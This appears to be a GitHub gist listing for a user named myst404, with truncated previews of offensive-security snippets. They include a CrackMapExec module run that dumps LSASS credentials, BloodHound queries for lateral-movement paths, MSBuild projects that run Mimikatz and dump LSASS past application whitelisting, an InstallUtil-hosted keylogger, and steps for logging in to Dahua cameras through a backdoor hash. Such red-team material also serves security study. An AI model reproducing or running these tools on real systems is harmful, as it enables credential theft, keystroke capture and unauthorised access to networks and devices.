myst404 / areadme.md

Created November 17, 2019 18:41 — forked from mpgn/areadme.md

Procdump CME module that dump LSASS process and extract the result with pypykatz

install pypykatz pip install pypykatz outisde your pipenv
Add this file to cme/module/procdump.py
compile python setup.py install
run cme smb 172.16.60.152 -u Administrator -p P@ssword -M procdump

myst404 / FindingComputersWithLocalAdmin.md

Created September 12, 2019 09:58 — forked from leechristensen/FindingComputersWithLocalAdmin.md

Useful cypher queries to find computers that are local admin on other computers, or to find groups containing bother users/computers.

Computer accounts added to local admins on machines via a group in the local admins

MATCH p1 = (c1:Computer)-[r:MemberOf*1..]->(g1:Group)
WITH c1,g1
MATCH p2 = (g1:Group)-[r:AdminTo]->(c2:Computer)
RETURN c1.name As Principal,c2.name AS Target,g1.name AS ViaGroup

Computer accounts added to local admins on machines explicitly

myst404 / findsubdomains.com.py

Last active April 6, 2018 09:42

Get subdomains from findsubdomains.com in Python (Aka the missing API)

	#!/usr/bin/env python
	# -- coding: utf-8 --

	import requests
	import sys
	from bs4 import BeautifulSoup

	def main():
	r = requests.get("https://findsubdomains.com/subdomains-of/" + str(sys.argv[1]))
	soup = BeautifulSoup(r.text, 'html.parser')

myst404 / MSBuildProcDumper.csproj

Created March 6, 2018 14:27 — forked from johnjohnsp1/MSBuildProcDumper.csproj

MSBuild - Process Dumper - lsass example

	<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
	<!-- This inline task executes c# code. -->
	<!-- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe MSBuildProcDumper.csproj -->
	<!-- Feel free to use a more aggressive class for testing. -->
	<Target Name="Hello">
	<ClassExample />
	</Target>
	<UsingTask
	TaskName="ClassExample"
	TaskFactory="CodeTaskFactory"

myst404 / InstallUtilMouseKeyLogger.cs

Created March 6, 2018 14:21

Input Capture - InstallUtil Hosted MouseClick / KeyLogger -

	using System;
	using System.IO;
	using System.Diagnostics;
	using System.Windows.Forms;
	using System.Configuration.Install;
	using System.Runtime.InteropServices;
	//KeyStroke Mouse Clicks Code
	/*
	* https://code.google.com/p/klog-sharp/
	*/

myst404 / Katz.Proj

Created March 6, 2018 14:21

Mimikatz In MSbuild

This file has been truncated, but you can view the full file.

	<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
	<!-- This inline task executes mimikatz. -->
	<!-- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe SimpleTasks.csproj -->
	<!-- Save This File And Execute The Above Command -->
	<!-- Author: Casey Smith, Twitter: @subTee -->
	<!-- License: BSD 3-Clause -->
	<Target Name="Hello">
	<ClassExample />
	</Target>
	<UsingTask

myst404 / gist:9e017e30a3846fecce50fb4ec60b7cac

Created August 30, 2017 11:06

HOW-TO dahua-backdoor-PoC

	The following repo is useful to exploit Dahuha devices: https://github.com/mcw0/PoC

	However the PoC dahua-backdoor-PoC.py is "intentionally missing essential details to be direct usable for anything else than login/logout."

	So how to log in from the browser easily?

	1) From the Python PoC, extract the "Downloaded MD5 hash" (usually for admin), example:
	[i] Downloaded MD5 hash: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

	2) In the browser complete the fields: